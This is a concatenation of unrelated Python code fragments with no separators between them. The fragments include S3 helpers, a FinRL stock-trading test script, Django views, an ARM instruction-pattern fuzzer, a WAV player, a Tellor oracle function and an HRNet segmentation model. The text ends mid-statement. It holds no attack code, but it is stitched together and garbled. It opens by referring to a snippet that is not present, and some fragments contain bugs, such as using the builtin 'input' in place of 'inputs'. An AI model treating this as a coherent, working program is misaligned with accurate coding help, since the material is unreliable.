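# The Blowfish snippet above is Python 2 only (str.decode('base64'), print statement), and
# its ciphertext decodes to 4 bytes, which is not a full 8-byte Blowfish block. A hedged
# Python 3 sketch of the same ECB decryption, written as a round trip so it runs on its
# own; pycryptodome provides Crypto.Cipher.Blowfish as in the original.
import base64
from Crypto.Cipher import Blowfish

key = b'\x00' * 8
demo_ciphertext = base64.b64encode(
    Blowfish.new(key, Blowfish.MODE_ECB).encrypt(b'8 bytes!'))           # stand-in data
plaintext = Blowfish.new(key, Blowfish.MODE_ECB).decrypt(base64.b64decode(demo_ciphertext))
print(plaintext)    # b'8 bytes!'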
http://stackoverflow.com/questions/33842944/check-if-a-key-exists-in-a-bucket-in-s3-using-boto3 :param s3_connection: :param check_bucket_name: :param object_name: :return: whether the object exists """ try: # s3_connection.Object(check_bucket_name, object_name).load() s3_connection.head_object(Bucket=check_bucket_name, Key=object_name) except botocore.exceptions.ClientError as e: if e.response['Error']['Code'] == "404": return False raise return True def object_exists_bucket(bucket_obj, object_name: str) -> bool: """ see the note above :param bucket_obj: :param object_name: :return: whether the object exists """ try: bucket_obj.Object(object_name).load() except botocore.exceptions.ClientError as e: if e.response['Error']['Code'] == "404": return False raise return True def catch_all(the_function): def new_function(*args, **kwargs): # pylint: disable=broad-except try: return the_function(*args, **kwargs) except Exception as e: print('got exception', e) sys.exit(1) return new_function def process_one_file(basename, full_name, compressed_basename, full_compressed_name, bucket_name): s3 = boto3.resource('s3') bucket = s3.Bucket(bucket_name) print('downloading', full_name, basename) bucket.download_file(full_name, basename) print('zipping', basename, compressed_basename) gzip_file_process(basename, compressed_basename) print('upload', compressed_basename, full_compressed_name) with open(compressed_basename, 'rb') as file_handle: new_object_summary = s3.ObjectSummary(bucket_name, full_compressed_name) new_object_summary.put(Body=file_handle) del new_object_summary print('removing', basename, compressed_basename) os.unlink(basename) os.unlink(compressed_basename) def print_exception(e): print('exception happened', e) sys.exit(1) import pandas as pd import numpy as np def test(start_date, end_date, ticker_list, data_source, time_interval, technical_indicator_list, drl_lib, env, model_name, if_vix = True, **kwargs): from finrl.apps import config # import DRL agents from finrl.drl_agents.stablebaselines3.models import DRLAgent as DRLAgent_sb3 from finrl.drl_agents.rllib.models import DRLAgent as DRLAgent_rllib from finrl.drl_agents.elegantrl.models import DRLAgent as DRLAgent_erl # import data processor from finrl.neo_finrl.data_processor import DataProcessor #fetch data DP = DataProcessor(data_source, **kwargs) data = DP.download_data(ticker_list, start_date, end_date, time_interval) data = DP.clean_data(data) data = DP.add_technical_indicator(data, technical_indicator_list) if if_vix: data = DP.add_vix(data) price_array, tech_array, turbulence_array = DP.df_to_array(data, if_vix) env_config = {'price_array':price_array, 'tech_array':tech_array, 'turbulence_array':turbulence_array, 'if_train':False} env_instance = env(config=env_config) #load elegantrl needs state dim, action dim and net dim net_dimension = kwargs.get('net_dimension', 2**7) cwd = kwargs.get('cwd','./'+str(model_name)) print("price_array: ",len(price_array)) if drl_lib == 'elegantrl': episode_total_assets = DRLAgent_erl.DRL_prediction(model_name=model_name, cwd=cwd, net_dimension=net_dimension, environment=env_instance) return episode_total_assets elif drl_lib == 'rllib': #load agent episode_total_assets = DRLAgent_rllib.DRL_prediction( model_name=model_name, env = env, price_array=price_array, tech_array=tech_array, turbulence_array=turbulence_array, agent_path = cwd) return episode_total_assets elif drl_lib == 'stable_baselines3': episode_total_assets = DRLAgent_sb3.DRL_prediction_load_from_file( model_name=model_name, 
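# Minimal usage sketch for object_exists above: it expects a boto3 *client* (head_object is
# a client method, not a resource method). The bucket and key names here are placeholders.
import boto3

s3_client = boto3.client('s3')
if object_exists(s3_client, 'example-bucket', 'path/to/object.txt'):
    print('object already present, skipping upload')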
environment = env_instance, cwd = cwd) return episode_total_assets else: raise ValueError('DRL library input is NOT supported. Please check.') if __name__ == '__main__': from finrl.app.config import DOW_30_TICKER from finrl.app.config import TECHNICAL_INDICATORS_LIST from finrl.app.config import TEST_START_DATE from finrl.app.config import TEST_END_DATE from finrl.app.config import ERL_PARAMS from finrl.app.config import RLlib_PARAMS from finrl.app.config import SAC_PARAMS #construct environment from finrl.neo_finrl.env_stock_trading.env_stock_trading import StockTradingEnv env = StockTradingEnv #demo for elegantrl account_value_erl=test(start_date = TEST_START_DATE, end_date = TEST_END_DATE, ticker_list = DOW_30_TICKER, data_source = 'yahoofinance', time_interval= '1D', technical_indicator_list= TECHNICAL_INDICATORS_LIST, drl_lib='elegantrl', env=env, model_name='ppo', cwd='./test_ppo', net_dimension = 512) #demo for rllib ray.shutdown() #always shutdown previous session if any account_value_rllib = test(start_date = TEST_START_DATE, end_date = TEST_END_DATE, ticker_list = DOW_30_TICKER, data_source = 'yahoofinance', time_interval= '1D', technical_indicator_list= TECHNICAL_INDICATORS_LIST, drl_lib='rllib', env=env, model_name='ppo', cwd='./test_ppo/checkpoint_000030/checkpoint-30', rllib_params = RLlib_PARAMS) #demo for stable baselines3 account_value_sb3=test(start_date = TEST_START_DATE, end_date = TEST_END_DATE, ticker_list = DOW_30_TICKER, data_source = 'yahoofinance', time_interval= '1D', technical_indicator_list= TECHNICAL_INDICATORS_LIST, drl_lib='stable_baselines3', env=env, model_name='sac', cwd='./test_sac.zip') from django.http import HttpResponse, FileResponse, Http404 from django.template import Context,loader from django.shortcuts import render from django.contrib import messages from collections import OrderedDict from .models import post, project, position import os from django.core.paginator import Paginator from pathlib import Path def index(request): context = {} context['static'] = '/static' if request.GET.get('expand_map') == 'yes': context['expand_map'] = 'yes' if request.GET.get('search'): search = request.GET.get('search') post_list = post.objects.filter(md_content__icontains = search) else: post_list = post.objects.all() page = request.GET.get('page') paginator = Paginator(post_list,5) posts = paginator.get_page(page) context['posts'] = posts return render(request, 'index.html',context) def contact(request): context = {} context['static'] = '/static' return render(request, 'contact.html', context) def posts(request, slug): context = {} context['static'] = '/static' try: posts = post.objects.get(slug=slug) except post.DoesNotExist: raise Http404('Post does not exist') context['post'] = posts if request.GET.get('expand_map') == 'yes': context['expand_map'] = 'yes' return render(request, 'post.html', context) def edits(request): # server cant find file without fullpath edits = os.path.join(Path(__file__).parents[1],Path('static/data.geojson')) # file only load in binary mode return FileResponse(open(edits, 'rb')) def services(request): context = {} context['static'] = '/static' return render(request, 'services.html', context) def resume(request): context_resume = {} context_resume['static'] = '/static' if request.GET.get('q') == 'software': context_resume['projects'] = project.objects.all().order_by('-current','-end_date') else: context_resume['position'] = position.objects.all() return render(request, 'resume.html',context_resume) def design(request): context = {} 
context['static'] = '/static' return render(request, 'design.html', context) def stress_analysis(request): context = {} context['static'] = '/static' return render(request, 'stress_analysis.html', context) def modeling(request): context = {} context['static'] = '/static' return render(request, '3d_modeling.html', context) def programming(request): context = {} context['static'] = '/static' return render(request, 'programming.html', context) arm-binja/tools/syn_bitpats.py10-100 #!/usr/bin/env python import re import sys import ctypes import struct import itertools import common def read_syns(): syns = [] seeds = [] with open('syn_seeds.txt') as fp: for i,line in enumerate(fp.readlines()): m = re.match(r'^(........) (.*)$', line.strip()) seeds.append(int(m.group(1),16)) syns.append(m.group(2)) return [syns, seeds] def read_patterns(): syns = [] pats = [] with open('syn_bitpats.txt') as fp: for i,line in enumerate(fp.readlines()): m = re.match(r'^{.*"(.*)".*$', line.strip()) syns.append(m.group(1)) pats.append(line.strip()) return [syns, pats] def pattern_generate(syn, insword): tmp = common.syntax_from_insword(insword) if syn != tmp: raise Exception('lookup says %08X: -%s- but we see -%s-' % (insword, syn, tmp)) always1 = insword always0 = ctypes.c_uint32(~insword).value # fuzz the insword, see what bits are always 1, always 0 for fuzz in common.fuzz5(): insword2 = insword ^ fuzz syn2 = common.syntax_from_insword(insword2) if syn == syn2: #print '%08X: %s' % (insword2, bin(insword2)[2:]) always1 &= insword2 always0 &= ctypes.c_uint32(~insword2).value else: pass constMaskStr = '' for i in range(31,-1,-1): assert not ((always1 & (1<=0: print(patterns[j]) else: print(pattern_generate(syn, seeds[i])) # assumed a syntax is given, and that's where searching will start else: [syns,seeds] = read_syns() cut = syns.index(sys.argv[1]) print('syns cut at index %d (line %d)' % (cut, cut+1)) for i in range(cut, len(syns)): print(pattern_generate(syns[i], seeds[i])) else: # redo everything [syns,seeds] = read_syns() for (i,syn) in enumerate(syns): print(pattern_generate(syn, seeds[i])) #!/usr/bin/env python # -*- coding: utf-8 -*- import sys import logging import tornado.web import io_weixin_auth class Test2Handler(tornado.web.RequestHandler): def get(self): logging.info('AAA: IN test-get') code = self.get_argument('code', None) token_info = io_weixin_auth.get_user_token_by_code(code) user_info = io_weixin_auth.get_user_info_by_token_info(token_info) self.render('test_001.html', info=user_info) def post(self): logging.info('AAA: IN test-post') self.render('test_001.html') #/* vim: set ai expandtab ts=4 sw=4 sts=4 tw=100: */ AlertaBateria/ReproductorDeSonidos.py class ReproductorWAV: def __init__(self, archivo): self.archivo=archivo print self.archivo def Reproducir(self): import pyaudio import wave #define stream chunk chunk = 1024 #open a wav format music f = wave.open(self.archivo,"rb") #instantiate PyAudio p = pyaudio.PyAudio() #open stream stream = p.open(format = p.get_format_from_width(f.getsampwidth()), channels = f.getnchannels(), rate = f.getframerate(), output = True) #read data data = f.readframes(chunk) #paly stream while data != '': stream.write(data) data = f.readframes(chunk) #stop stream stream.stop_stream() stream.close() #close PyAudio p.terminate() src/telliot_feed_examples/utils/oracle_write.py from typing import Any from typing import Optional from typing import Tuple from telliot_core.contract.contract import Contract from telliot_core.datafeed import DataFeed from 
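# The ReproductorWAV class above is Python 2 (print statements), and its playback loop
# compares the bytes returned by readframes against the str '' so it would never terminate
# cleanly under Python 3. A Python 3 sketch of the same PyAudio streaming loop:
import wave
import pyaudio


def play_wav(path, chunk=1024):
    wav = wave.open(path, 'rb')
    pa = pyaudio.PyAudio()
    stream = pa.open(format=pa.get_format_from_width(wav.getsampwidth()),
                     channels=wav.getnchannels(),
                     rate=wav.getframerate(),
                     output=True)
    data = wav.readframes(chunk)
    while len(data) > 0:                  # readframes returns b'' at end of file
        stream.write(data)
        data = wav.readframes(chunk)
    stream.stop_stream()
    stream.close()
    pa.terminate()
    wav.close()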
telliot_core.utils.response import ResponseStatus from web3.datastructures import AttributeDict from telliot_feed_examples.utils.contract import write_with_retry from telliot_feed_examples.utils.log import get_logger logger = get_logger(__name__) async def tip_query( oracle: Contract, datafeed: DataFeed, tip: int, gas_price: str = "3", retries: int = 2, ) -> Tuple[Optional[AttributeDict[Any, Any]], ResponseStatus]: """Call the TellorX oracle contract's tipQuery function Tip TRB for the given datafeed's query ID to incentivise reporters to report relevant data.""" tx_receipt, status = await write_with_retry( oracle, func_name="tipQuery", gas_limit=350000, legacy_gas_price=int(gas_price), extra_gas_price=20, retries=retries, _queryId=datafeed.query.query_id, _queryData=datafeed.query.query_data, _tip=tip, ) return tx_receipt, status rcommande/passr import functools import types def if_configured(func): @functools.wraps(func) def wrapper(self, *args, **kwargs): if not getattr(self, 'is_configured'): raise Exception("Application not configured") return func(self, *args, **kwargs) return wrapper class Application(object): routes = [] def __init__(self, route_resolver, state_factory): self.route_resolver = route_resolver() self.state_factory = state_factory def configure(self, base_path): self.base_path = base_path self.is_configured = True @if_configured def get_state(self, request): state = self.state_factory(request, self) for view_obj, matchdict in self.route_resolver(request, self): if not isinstance(view_obj, types.FunctionType): state = view_obj(request=request, state=state)(**matchdict) else: state = view_obj(request=request, state=state, **matchdict) return state def route(self, name, path): def wrapper(func): self.routes.append({"name": name, "path": path, "func": func}) @functools.wraps(func) def wrapped(*args, **kwargs): pass return wrapped return wrapper if '__file__' in globals(): import os, sys sys.path.append(os.path.join(os.path.dirname(__file__), '..')) import numpy as np from dezero import Variable import dezero.functions as F x = Variable(np.array([[1, 2, 3], [4, 5, 6]])) c = Variable(np.array([[10, 20, 30], [40, 50, 60]])) t = x + c y = F.sum(t) y.backward(retain_grad=True) print(y.grad) print(t.grad) print(x.grad) print(c.grad)maiyajj/AutoTest_script-Appium_Connect # coding=utf-8 try: from src.testcase.GN_Y201J.case.GN_Y201J_ELECTRICITY_METER.GN_Y201J_ELECTRICITY_METER_001 import * from src.testcase.GN_Y201J.case.GN_Y201J_ELECTRICITY_METER.GN_Y201J_ELECTRICITY_METER_002 import * from src.testcase.GN_Y201J.case.GN_Y201J_ELECTRICITY_METER.GN_Y201J_ELECTRICITY_METER_003 import * from src.testcase.GN_Y201J.case.GN_Y201J_ELECTRICITY_METER.GN_Y201J_ELECTRICITY_METER_004 import * from src.testcase.GN_Y201J.case.GN_Y201J_ELECTRICITY_METER.GN_Y201J_ELECTRICITY_METER_005 import * from src.testcase.GN_Y201J.case.GN_Y201J_ELECTRICITY_METER.GN_Y201J_ELECTRICITY_METER_006 import * from src.testcase.GN_Y201J.case.GN_Y201J_ELECTRICITY_METER.GN_Y201J_ELECTRICITY_METER_007 import * from src.testcase.GN_Y201J.case.GN_Y201J_ELECTRICITY_METER.GN_Y201J_ELECTRICITY_METER_008 import * from src.testcase.GN_Y201J.case.GN_Y201J_ELECTRICITY_METER.GN_Y201J_ELECTRICITY_METER_009 import * from src.testcase.GN_Y201J.case.GN_Y201J_ELECTRICITY_METER.GN_Y201J_ELECTRICITY_METER_010 import * from src.testcase.GN_Y201J.case.GN_Y201J_ELECTRICITY_METER.GN_Y201J_ELECTRICITY_METER_011 import * from src.testcase.GN_Y201J.case.GN_Y201J_ELECTRICITY_METER.GN_Y201J_ELECTRICITY_METER_012 import * from 
src.testcase.GN_Y201J.case.GN_Y201J_ELECTRICITY_METER.GN_Y201J_ELECTRICITY_METER_013 import * except ImportError as e: print(e) 1-10 import torch import torch.nn.functional as F def ordinal_softmax(x, device='cpu'): """ Convert the ordinal logit output to label probabilities. Parameters ---------- x: torch.Tensor, shape=(num_samples,num_classes-1) Logit output of the final Dense(num_classes-1) layer. device: 'cpu', 'cuda', or None (default='cpu') If GPUs are utilized, then the device should be passed accordingly. Returns ---------- probs_tensor: torch.Tensor, shape=(num_samples, num_classes) Probabilities of each class (columns) for each sample (rows). Examples ---------- >>> ordinal_softmax(torch.tensor([[-1.,1],[-2,2]])) tensor([[0.7311, 0.0723, 0.1966], [0.8808, 0.0142, 0.1050]]) """ # Convert the ordinal logits into cumulative probabilities. log_probs = F.logsigmoid(x).to(device) cum_probs = torch.cat((torch.ones(x.shape[0],1,dtype=torch.float32).to(device), torch.exp(torch.cumsum(log_probs, dim = 1)), torch.zeros(x.shape[0],1,dtype=torch.float32).to(device)), dim=1) return cum_probs[:,0:-1] - cum_probs[:,1:] import tensorflow as tf from tensorflow.keras.models import Model from tensorflow.keras.layers import Input, Conv2D, BatchNormalization, Activation from tensorflow.keras.layers import UpSampling2D, add, concatenate, MaxPool2D, Dropout import tensorflow.keras.backend as K import numpy as np def basic_Block(inputs, out_filters, strides=(1, 1), with_conv_shortcut=False): x = Conv2D(out_filters, 3, padding='same', strides=strides, use_bias=False, kernel_initializer='he_normal')(inputs) x = BatchNormalization(axis=3,)(x) x = Activation('relu')(x) x = Conv2D(out_filters, 3, padding='same', use_bias=False, kernel_initializer='he_normal')(x) x = BatchNormalization(axis=3)(x) if with_conv_shortcut: residual = Conv2D(out_filters, 1, strides=strides, use_bias=False, kernel_initializer='he_normal')(input) residual = BatchNormalization(axis=3)(residual) x = add([x, residual]) else: x = add([x, inputs]) x = Activation('relu')(x) return x def bottleneck_Block(inputs, out_filters, strides=(1, 1), with_conv_shortcut=False): expansion = 4 de_filters = int(out_filters / expansion) x = Conv2D(de_filters, 1, use_bias=False, kernel_initializer='he_normal')(inputs) x = BatchNormalization(axis=3)(x) x = Activation('relu')(x) x = Conv2D(de_filters, 3, strides=strides, padding='same', use_bias=False, kernel_initializer='he_normal')(x) x = BatchNormalization(axis=3)(x) x = Activation('relu')(x) x = Conv2D(out_filters, 1, use_bias=False, kernel_initializer='he_normal')(x) x = BatchNormalization(axis=3)(x) if with_conv_shortcut: residual = Conv2D(out_filters, 1, strides=strides, use_bias=False, kernel_initializer='he_normal')(inputs) residual = BatchNormalization(axis=3)(residual) x = add([x, residual]) else: x = add([x, inputs]) x = Activation('relu')(x) return x # 第一个block, 包括两个3*3的下采样用于图片的输入和 N11 def stem_net(inputs): x = Conv2D(64, 3, strides=(2, 2), padding='same', use_bias=False, kernel_initializer='he_normal')(inputs) x = BatchNormalization(axis=3)(x) # x = Activation('relu')(x) x = Conv2D(64, 3, strides=(2, 2), padding='same', use_bias=False, kernel_initializer='he_normal')(x) x = BatchNormalization(axis=3)(x) x = Activation('relu')(x) x = bottleneck_Block(x, 256, with_conv_shortcut=True) x = bottleneck_Block(x, 256, with_conv_shortcut=False) x = bottleneck_Block(x, 256, with_conv_shortcut=False) x = bottleneck_Block(x, 256, with_conv_shortcut=False) return x # 第一个 def transition_layer1(x, out_chan): 
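# In basic_Block above, the with_conv_shortcut branch builds the residual from the Python
# builtin `input` instead of the `inputs` argument, so the projection shortcut never sees
# the block's input tensor. A corrected sketch of the block with only that reference fixed:
from tensorflow.keras.layers import Activation, BatchNormalization, Conv2D, add


def basic_block_fixed(inputs, out_filters, strides=(1, 1), with_conv_shortcut=False):
    x = Conv2D(out_filters, 3, padding='same', strides=strides,
               use_bias=False, kernel_initializer='he_normal')(inputs)
    x = BatchNormalization(axis=3)(x)
    x = Activation('relu')(x)
    x = Conv2D(out_filters, 3, padding='same',
               use_bias=False, kernel_initializer='he_normal')(x)
    x = BatchNormalization(axis=3)(x)
    if with_conv_shortcut:
        residual = Conv2D(out_filters, 1, strides=strides,
                          use_bias=False, kernel_initializer='he_normal')(inputs)  # was (input)
        residual = BatchNormalization(axis=3)(residual)
        x = add([x, residual])
    else:
        x = add([x, inputs])
    return Activation('relu')(x)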
x0 = Conv2D(out_chan[0], 3, padding='same', use_bias=False, kernel_initializer='he_normal')(x) x0 = BatchNormalization(axis=3)(x0) x0 = Activation('relu')(x0) x1 = Conv2D(out_chan[1], 3, strides=(2, 2), padding='same', use_bias=False, kernel_initializer='he_normal')(x) x1 = BatchNormalization(axis=3)(x1) x1 = Activation('relu')(x1) return [x0, x1] # block1_0 def make_branch1(x, out_chan): x1_0 = basic_Block(x[0], out_chan[0], with_conv_shortcut=False) x1_0 = basic_Block(x1_0, out_chan[0], with_conv_shortcut=False) x1_0 = basic_Block(x1_0, out_chan[0], with_conv_shortcut=False) x1_0 = basic_Block(x1_0, out_chan[0], with_conv_shortcut=False) x1_1 = basic_Block(x[1], out_chan[1], with_conv_shortcut=False) x1_1 = basic_Block(x1_1, out_chan[1], with_conv_shortcut=False) x1_1 = basic_Block(x1_1, out_chan[1], with_conv_shortcut=False) x1_1 = basic_Block(x1_1, out_chan[1], with_conv_shortcut=False) return [x1_0, x1_1] # 不同分辨率之间的交互 def fuse_layer1(x, out_filters): # x0_0 = x[0] x0_1 = Conv2D(out_filters[0], 1, use_bias=False, kernel_initializer='he_normal')(x[1]) x0_1 = BatchNormalization(axis=3)(x0_1) x0_1 = tf.compat.v1.image.resize_bilinear(x0_1, [tf.shape(x[0])[1], tf.shape(x[0])[2]], align_corners=True) x0 = add([x[0], x0_1]) x0 = Activation('relu')(x0) x1_0 = Conv2D(out_filters[1], 3, strides=(2, 2), padding='same', use_bias=False, kernel_initializer='he_normal')(x[0]) x1_0 = BatchNormalization(axis=3)(x1_0) # x1_1 = x[1] x1 = add([x1_0, x[1]]) x1 = Activation('relu')(x1) return [x0, x1] def transition_layer2(x, out_chan): # x0 = x[0] # x1 = x[1] x2 = Conv2D(out_chan[2], 3, strides=(2, 2), padding='same', use_bias=False, kernel_initializer='he_normal')(x[1]) x2 = BatchNormalization(axis=3)(x2) x2 = Activation('relu')(x2) return [x[0], x[1], x2] def make_branch2(x, out_filters): x2_0 = basic_Block(x[0], out_filters[0], with_conv_shortcut=False) x2_0 = basic_Block(x2_0, out_filters[0], with_conv_shortcut=False) x2_0 = basic_Block(x2_0, out_filters[0], with_conv_shortcut=False) x2_0 = basic_Block(x2_0, out_filters[0], with_conv_shortcut=False) x2_1 = basic_Block(x[1], out_filters[1], with_conv_shortcut=False) x2_1 = basic_Block(x2_1, out_filters[1], with_conv_shortcut=False) x2_1 = basic_Block(x2_1, out_filters[1], with_conv_shortcut=False) x2_1 = basic_Block(x2_1, out_filters[1], with_conv_shortcut=False) x2_2 = basic_Block(x[2], out_filters[2], with_conv_shortcut=False) x2_2 = basic_Block(x2_2, out_filters[2], with_conv_shortcut=False) x2_2 = basic_Block(x2_2, out_filters[2], with_conv_shortcut=False) x2_2 = basic_Block(x2_2, out_filters[2], with_conv_shortcut=False) return [x2_0, x2_1, x2_2] def fuse_layer2(x, out_chan): x0_1 = Conv2D(out_chan[0], 1, use_bias=False, kernel_initializer='he_normal')(x[1]) x0_1 = BatchNormalization(axis=3)(x0_1) x0_2 = Conv2D(out_chan[0], 1, use_bias=False, kernel_initializer='he_normal')(x[2]) x0_2 = BatchNormalization(axis=3)(x0_2) x0_1 = tf.compat.v1.image.resize_bilinear(x0_1, [tf.shape(x[0])[1], tf.shape(x[0])[2]], align_corners=True) x0_2 = tf.compat.v1.image.resize_bilinear(x0_2, [tf.shape(x[0])[1], tf.shape(x[0])[2]], align_corners=True) x0 = add([x[0], x0_1, x0_2]) x0 = Activation('relu')(x0) x1_0 = Conv2D(out_chan[1], 3, strides=(2, 2), padding='same', use_bias=False, kernel_initializer='he_normal')(x[0]) x1_0 = BatchNormalization(axis=3)(x1_0) x1_2 = Conv2D(out_chan[1], 1, use_bias=False, kernel_initializer='he_normal')(x[2]) x1_2 = BatchNormalization(axis=3)(x1_2) x1_2 = tf.compat.v1.image.resize_bilinear(x1_2, [tf.shape(x[1])[1], tf.shape(x[1])[2]], 
align_corners=True) x1 = add([x1_0, x[1], x1_2]) x1 = Activation('relu')(x1) x2_0 = Conv2D(out_chan[0], 3, strides=(2, 2), padding='same', use_bias=False, kernel_initializer='he_normal')(x[0]) x2_0 = BatchNormalization(axis=3)(x2_0) x2_0 = Conv2D(out_chan[2], 3, strides=(2, 2), padding='same', use_bias=False, kernel_initializer='he_normal')(x2_0) x2_0 = BatchNormalization(axis=3)(x2_0) x2_1 = Conv2D(out_chan[2], 3, strides=(2, 2), padding='same', use_bias=False, kernel_initializer='he_normal')(x[1]) x2_1 = BatchNormalization(axis=3)(x2_1) x2 = add([x2_0, x2_1, x[2]]) x2 = Activation('relu')(x2) return [x0, x1, x2] # 变换通道数 def transition_layer3(x, out_chan): # x0 = x[0] # x1 = x[1] # x2 = x[2] x3 = Conv2D(out_chan[3], 3, strides=(2, 2), padding='same', use_bias=False, kernel_initializer='he_normal')(x[2]) x3 = BatchNormalization(axis=3)(x3) x3 = Activation('relu')(x3) return [x[0], x[1], x[2], x3] def make_branch3(x, out_chan): x3_0 = basic_Block(x[0], out_chan[0], with_conv_shortcut=False) x3_0 = basic_Block(x3_0, out_chan[0], with_conv_shortcut=False) x3_0 = basic_Block(x3_0, out_chan[0], with_conv_shortcut=False) x3_0 = basic_Block(x3_0, out_chan[0], with_conv_shortcut=False) x3_1 = basic_Block(x[1], out_chan[1], with_conv_shortcut=False) x3_1 = basic_Block(x3_1, out_chan[1], with_conv_shortcut=False) x3_1 = basic_Block(x3_1, out_chan[1], with_conv_shortcut=False) x3_1 = basic_Block(x3_1, out_chan[1], with_conv_shortcut=False) x3_2 = basic_Block(x[2], out_chan[2], with_conv_shortcut=False) x3_2 = basic_Block(x3_2, out_chan[2], with_conv_shortcut=False) x3_2 = basic_Block(x3_2, out_chan[2], with_conv_shortcut=False) x3_2 = basic_Block(x3_2, out_chan[2], with_conv_shortcut=False) x3_3 = basic_Block(x[3], out_chan[3], with_conv_shortcut=False) x3_3 = basic_Block(x3_3, out_chan[3], with_conv_shortcut=False) x3_3 = basic_Block(x3_3, out_chan[3], with_conv_shortcut=False) x3_3 = basic_Block(x3_3, out_chan[3], with_conv_shortcut=False) return [x3_0, x3_1, x3_2, x3_3] def fuse_layer3(x, num_chan): x0_1 = Conv2D(num_chan[0], 1, use_bias=False, kernel_initializer='he_normal')(x[1]) x0_1 = BatchNormalization(axis=3)(x0_1) x0_2 = Conv2D(num_chan[0], 1, use_bias=False, kernel_initializer='he_normal')(x[2]) x0_2 = BatchNormalization(axis=3)(x0_2) x0_3 = Conv2D(num_chan[0], 1, use_bias=False, kernel_initializer='he_normal')(x[3]) x0_3 = BatchNormalization(axis=3)(x0_3) x0_1 = tf.compat.v1.image.resize_bilinear(x0_1, [tf.shape(x[0])[1], tf.shape(x[0])[2]], align_corners=True) x0_2 = tf.compat.v1.image.resize_bilinear(x0_2, [tf.shape(x[0])[1], tf.shape(x[0])[2]], align_corners=True) x0_3 = tf.compat.v1.image.resize_bilinear(x0_3, [tf.shape(x[0])[1], tf.shape(x[0])[2]], align_corners=True) x0 = add([x[0], x0_1, x0_2, x0_3]) x0 = Activation('relu')(x0) x1_0 = Conv2D(num_chan[1], 3, 2, padding='same', use_bias=False, kernel_initializer='he_normal')(x[0]) x1_0 = BatchNormalization()(x1_0) x1_2 = Conv2D(num_chan[1], 1, padding='same', use_bias=False, kernel_initializer='he_normal')(x[2]) x1_2 = BatchNormalization()(x1_2) x1_3 = Conv2D(num_chan[1], 1, padding='same', use_bias=False, kernel_initializer='he_normal')(x[3]) x1_2 = tf.compat.v1.image.resize_bilinear(x1_2, [tf.shape(x[1])[1], tf.shape(x[1])[2]], align_corners=True) x1_3 = tf.compat.v1.image.resize_bilinear(x1_3, [tf.shape(x[1])[1], tf.shape(x[1])[2]], align_corners=True) x1 = add([x1_0, x[1], x1_2, x1_3]) x1 = Activation('relu')(x1) x2_0 = Conv2D(num_chan[0], 3, 2, padding='same', use_bias=False, kernel_initializer='he_normal')(x[0]) x2_0 = 
BatchNormalization()(x2_0) x2_0 = Conv2D(num_chan[2], 3, 2, padding='same', use_bias=False, kernel_initializer='he_normal')(x2_0) x2_0 = BatchNormalization()(x2_0) x2_1 = Conv2D(num_chan[2], 3, 2, padding='same', use_bias=False, kernel_initializer='he_normal')(x[1]) x2_1 = BatchNormalization()(x2_1) x2_3 = Conv2D(num_chan[2], 1, padding='same', use_bias=False, kernel_initializer='he_normal')(x[3]) x2_3 = tf.compat.v1.image.resize_bilinear(x2_3, [tf.shape(x[2])[1], tf.shape(x[2])[2]], align_corners=True) x2 = add([x2_0, x2_1, x[2], x2_3]) x2 = Activation('relu')(x2) x3_0 = Conv2D(num_chan[0], 3, 2, padding='same', use_bias=False, kernel_initializer='he_normal')(x[0]) x3_0 = BatchNormalization()(x3_0) x3_0 = Conv2D(num_chan[0], 3, 2, padding='same', use_bias=False, kernel_initializer='he_normal')(x3_0) x3_0 = BatchNormalization()(x3_0) x3_0 = Conv2D(num_chan[3], 3, 2, padding='same', use_bias=False, kernel_initializer='he_normal')(x3_0) x3_0 = BatchNormalization()(x3_0) x3_1 = Conv2D(num_chan[1], 3, 2, padding='same', use_bias=False, kernel_initializer='he_normal')(x[1]) x3_1 = BatchNormalization()(x3_1) x3_1 = Conv2D(num_chan[3], 3, 2, padding='same', use_bias=False, kernel_initializer='he_normal')(x3_1) x3_1 = BatchNormalization()(x3_1) x3_2 = Conv2D(num_chan[3], 3, 2, padding='same', use_bias=False, kernel_initializer='he_normal')(x[2]) x3_2 = BatchNormalization()(x3_2) x3 = add([x3_0, x3_1, x3_2, x[3]]) x3 = Activation('relu')(x3) return [x0, x1, x2, x3] # 最后的输出层 def final_layer(x, classes, size, activation): x0 = x[0] x1 = tf.compat.v1.image.resize_bilinear(x[1], [tf.shape(x[0])[1], tf.shape(x[0])[2]], align_corners=True) x2 = tf.compat.v1.image.resize_bilinear(x[2], [tf.shape(x[0])[1], tf.shape(x[0])[2]], align_corners=True) x3 = tf.compat.v1.image.resize_bilinear(x[3], [tf.shape(x[0])[1], tf.shape(x[0])[2]], align_corners=True) x = concatenate([x0, x1, x2, x3], axis=-1) # x = Conv2D(x.shape[3], 3, 1, use_bias=False, padding='same', kernel_initializer='he_normal')(x) # x = BatchNormalization()(x) # x = Activation('relu')(x) x = tf.compat.v1.image.resize_bilinear(x, size, align_corners=True) x = Conv2D(x.shape[3], 1, 1, use_bias=False, kernel_initializer='he_normal')(x) x = BatchNormalization()(x) x = Activation('relu')(x) x = Conv2D(classes, 1, kernel_initializer='he_normal')(x) if activation in {'softmax', 'sigmoid'}: x = Activation(activation, name=activation)(x) return x def seg_hrnet(batch_size, height, width, channel, classes, activation='softmax', hrnet_type='hrnet_w48'): if hrnet_type == 'hrnet_w18': size = [18, 36, 72, 144] elif hrnet_type == 'hrnet_w32': size = [32, 64, 128, 256] elif hrnet_type == 'hrnet_w48': size = [48, 96, 192, 384] else: raise ValueError("Unsupported hrnet type!") inputs = Input(batch_shape=(batch_size,) + (height, width, channel)) x = stem_net(inputs) x = transition_layer1(x, size[:2]) for i in range(1): x = make_branch1(x, size[:2]) x = fuse_layer1(x, size[:2]) x = transition_layer2(x, size[:3]) for i in range(4): x = make_branch2(x, size[:3]) x = fuse_layer2(x, size[:3]) x = transition_layer3(x, size) for i in range(3): x = make_branch3(x, size) x = fuse_layer3(x, size) out = final_layer(x, classes=classes, size=(tf.shape(inputs)[1], tf.shape(inputs)[2]), activation=activation) model = Model(inputs=inputs, outputs=out) return model def spatial_gather_module(feats, probs, scale): batch_size, h, w, c = probs.get_shape().as_list() probs = tf.transpose(tf.reshape(probs, (batch_size, -1, c)), [0, 2, 1]) feats = tf.reshape(feats, (batch_size, -1, 
